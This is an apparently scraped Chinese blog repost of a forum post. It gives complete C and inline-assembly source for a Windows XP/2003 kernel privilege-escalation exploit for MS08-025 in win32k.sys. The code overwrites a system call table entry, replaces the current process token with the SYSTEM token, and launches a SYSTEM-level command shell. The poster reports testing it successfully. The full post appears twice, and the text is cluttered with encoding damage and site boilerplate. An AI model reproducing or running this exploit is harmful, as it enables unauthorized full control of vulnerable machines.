MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
生活随笔
收集整理的這篇文章主要介紹了
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> 以下消息來自幻影論壇[Ph4nt0m]郵件組 ? [url]http://hi.baidu.com/vessial/blog/item/4ae4291b46f8e91c8718bfc2.html[/url]
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一種利用方式,通過覆蓋SSDT表NtVdmControl的地址進行shellcode的執行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE?????????????? ProcessHandle,
?????????????????????????????????????? PVOID??????????? *BaseAddress,
?????????????????????????????????????? ULONG??????????????? ZeroBits,
?????????????????????????????????????? PULONG?????????? RegionSize,
?????????????????????????????????????? ULONG??????????????? AllocationType,
?????????????????????????????????????? ULONG??????????????? Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
??? printf("%s:%x\n", msg, GetLastError());
??? ExitProcess(0);
}
ZWVDMCONTROL??? ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;
_declspec(naked) int ShellCode()
{
????? if ( OsVersionInfo.dwMinorVersion == 1 ) {
?????? __asm {
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? mov eax,0xFFDFF124 // eax = KPCR (not <?xml:namespace prefix = st1 ns = "urn:schemas-microsoft-com:office:smarttags" />3G Mode)
?????????????? Mov eax,[eax]
?????????????? mov esi,[eax+0x220]
?????????????? mov eax,esi
searchXp:
?????????????? mov eax,[eax+0x88]
?????????????? sub eax,0x88
?????????????? mov edx,[eax+0x84]
?????????????? cmp edx,0x4 // Find System Process
?????????????? jne searchXp
?????????????? mov eax,[eax+0xc8] // 獲取system進程的token
?????????????? mov [esi+0xc8],eax // 修改當前進程的token
?????????????? ret 8
?????? }
?? }
?? if ( OsVersionInfo.dwMinorVersion == 2 ) {
?????? __asm {
?????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
?????????????? Mov eax,[eax]
?????????????? mov esi,[eax+0x220]
?????????????? mov eax,esi
search2003:
?????????????? mov eax,[eax+0x98]
?????????????? sub eax,0x98
?????????????? mov edx,[eax+0x94]
??????????????? cmp edx,0x4 // Find System Process
?????????????? jne search2003
?????????????? mov eax,[eax+0xd8] // 獲取system進程的token
?????????????? mov [esi+0xd8],eax // 修改當前進程的token
?????????????? ret 8
?????? }
?? }
}
void InitTrampoline()
{
?? PNTALLOCATE NtAllocateVirtualMemory;
?? LPVOID?????? addr = (LPVOID)3;
?? DWORD?????? dwShellSize=0x1000;
?? unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0
?????????????????????????????? "\xc3";?????????????? // retn
?? NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");
?? if( !NtAllocateVirtualMemory )
?????? exit(0);
?? NtAllocateVirtualMemory(?? (HANDLE)-1,
?????????????????????????????? &addr,
?????????????????????????????? 0,
?????????????????????????????? &dwShellSize,
?????????????????????????????? MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
?????????????????????????????? PAGE_EXECUTE_READWRITE );
?? if( (PULONG)addr )
?? {
?????? printf("\n[++] Error Allocating memory\n");
?????? exit(0);
?? }
?? *(PULONG*)(trampoline+1)=(PULONG)ShellCode;
?? memcpy(NULL,trampoline,sizeof(trampoline)-1);
}
int Callback_Overview()
{
?? printf("\n");
?? printf("=====================================================================?? \n");
?? printf("\t\tMicrosoft Windows XP SP2 - MS08-025 -?????? \n");
?? printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit?? \n");
?? printf("=====================================================================?? \n");
?? printf("+ References:\n");
?? printf(" [url]http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx[/url]\n");
?? printf(" [url]http://hi.baidu.com/vessial[/url]\n\n");
?? return 1;
}
void GetFunction()
{
??? HANDLE??? hNtdll,hNtos;
???
??? hNtdll = LoadLibrary("ntdll.dll");
??? if(hNtdll == NULL)
??????? ErrorQuit("LoadLibrary failed.\n");
???????
??? ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
??? if(ZwVdmControl == NULL)
??????? ErrorQuit("GetProcAddress failed.\n");
??????????????
??? FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{
?? //PULONG?? PntVdmControl=0x805F0DB0;
??? char*?? PntVdmControl=0x80502460; //通過*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4獲得
???
????
?? STARTUPINFOA??????????????? stStartup;
?? PROCESS_INFORMATION??????????? pi;
?? Callback_Overview();
?? GetFunction();
?? RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
?? OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
?? GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
?? if ( OsVersionInfo.dwMajorVersion != 5 ) {
?????? printf( "Not NT5 system\n" );
?????? ExitProcess( 0 );
?? }
?? //Get Operatiny System Version
???????
?? InitTrampoline();
?? SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
?? SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
?? printf("\n[+] Executing Shellcode...\n");
?? ZwVdmControl(0, NULL);
?? GetStartupInfo( &stStartup );
?? CreateProcess( NULL,
?????? "cmd.exe",
?????? NULL,
?????? NULL,
?????? TRUE,
?????? NULL,
?????? NULL,
?????? NULL,
?????? &stStartup,
?????? &pi );?? //此時創建的cmd.exe是SYSTEM權限
??
?? printf("[+] Exiting...\n");
?? return TRUE;
}
我在XP測試成功,下面的第一個cmd是SYSTEM權限,這是我們提權后的,一個cmd是test權限
?
?
?
歡迎轉載,但希望大家注明出處和保留其完整性,謝謝:)MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一種利用方式,通過覆蓋SSDT表NtVdmControl的地址進行shellcode的執行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE?????????????? ProcessHandle,
?????????????????????????????????????? PVOID??????????? *BaseAddress,
?????????????????????????????????????? ULONG??????????????? ZeroBits,
?????????????????????????????????????? PULONG?????????? RegionSize,
?????????????????????????????????????? ULONG??????????????? AllocationType,
?????????????????????????????????????? ULONG??????????????? Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
??? printf("%s:%x\n", msg, GetLastError());
??? ExitProcess(0);
}
ZWVDMCONTROL??? ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;
_declspec(naked) int ShellCode()
{
????? if ( OsVersionInfo.dwMinorVersion == 1 ) {
?????? __asm {
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? mov eax,0xFFDFF124 // eax = KPCR (not <?xml:namespace prefix = st1 ns = "urn:schemas-microsoft-com:office:smarttags" />3G Mode)
?????????????? Mov eax,[eax]
?????????????? mov esi,[eax+0x220]
?????????????? mov eax,esi
searchXp:
?????????????? mov eax,[eax+0x88]
?????????????? sub eax,0x88
?????????????? mov edx,[eax+0x84]
?????????????? cmp edx,0x4 // Find System Process
?????????????? jne searchXp
?????????????? mov eax,[eax+0xc8] // 獲取system進程的token
?????????????? mov [esi+0xc8],eax // 修改當前進程的token
?????????????? ret 8
?????? }
?? }
?? if ( OsVersionInfo.dwMinorVersion == 2 ) {
?????? __asm {
?????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
?????????????? Mov eax,[eax]
?????????????? mov esi,[eax+0x220]
?????????????? mov eax,esi
search2003:
?????????????? mov eax,[eax+0x98]
?????????????? sub eax,0x98
?????????????? mov edx,[eax+0x94]
??????????????? cmp edx,0x4 // Find System Process
?????????????? jne search2003
?????????????? mov eax,[eax+0xd8] // 獲取system進程的token
?????????????? mov [esi+0xd8],eax // 修改當前進程的token
?????????????? ret 8
?????? }
?? }
}
void InitTrampoline()
{
?? PNTALLOCATE NtAllocateVirtualMemory;
?? LPVOID?????? addr = (LPVOID)3;
?? DWORD?????? dwShellSize=0x1000;
?? unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0
?????????????????????????????? "\xc3";?????????????? // retn
?? NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");
?? if( !NtAllocateVirtualMemory )
?????? exit(0);
?? NtAllocateVirtualMemory(?? (HANDLE)-1,
?????????????????????????????? &addr,
?????????????????????????????? 0,
?????????????????????????????? &dwShellSize,
?????????????????????????????? MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
?????????????????????????????? PAGE_EXECUTE_READWRITE );
?? if( (PULONG)addr )
?? {
?????? printf("\n[++] Error Allocating memory\n");
?????? exit(0);
?? }
?? *(PULONG*)(trampoline+1)=(PULONG)ShellCode;
?? memcpy(NULL,trampoline,sizeof(trampoline)-1);
}
int Callback_Overview()
{
?? printf("\n");
?? printf("=====================================================================?? \n");
?? printf("\t\tMicrosoft Windows XP SP2 - MS08-025 -?????? \n");
?? printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit?? \n");
?? printf("=====================================================================?? \n");
?? printf("+ References:\n");
?? printf(" [url]http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx[/url]\n");
?? printf(" [url]http://hi.baidu.com/vessial[/url]\n\n");
?? return 1;
}
void GetFunction()
{
??? HANDLE??? hNtdll,hNtos;
???
??? hNtdll = LoadLibrary("ntdll.dll");
??? if(hNtdll == NULL)
??????? ErrorQuit("LoadLibrary failed.\n");
???????
??? ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
??? if(ZwVdmControl == NULL)
??????? ErrorQuit("GetProcAddress failed.\n");
??????????????
??? FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{
?? //PULONG?? PntVdmControl=0x805F0DB0;
??? char*?? PntVdmControl=0x80502460; //通過*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4獲得
???
????
?? STARTUPINFOA??????????????? stStartup;
?? PROCESS_INFORMATION??????????? pi;
?? Callback_Overview();
?? GetFunction();
?? RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
?? OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
?? GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
?? if ( OsVersionInfo.dwMajorVersion != 5 ) {
?????? printf( "Not NT5 system\n" );
?????? ExitProcess( 0 );
?? }
?? //Get Operatiny System Version
???????
?? InitTrampoline();
?? SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
?? SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
?? printf("\n[+] Executing Shellcode...\n");
?? ZwVdmControl(0, NULL);
?? GetStartupInfo( &stStartup );
?? CreateProcess( NULL,
?????? "cmd.exe",
?????? NULL,
?????? NULL,
?????? TRUE,
?????? NULL,
?????? NULL,
?????? NULL,
?????? &stStartup,
?????? &pi );?? //此時創建的cmd.exe是SYSTEM權限
??
?? printf("[+] Exiting...\n");
?? return TRUE;
}
我在XP測試成功,下面的第一個cmd是SYSTEM權限,這是我們提權后的,一個cmd是test權限
?
?
轉載于:https://blog.51cto.com/netwalk/72233
總結
以上是生活随笔為你收集整理的MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 合格网络管理员需了解的主要职责
- 下一篇: 在 ASP.NET 使用 jQuery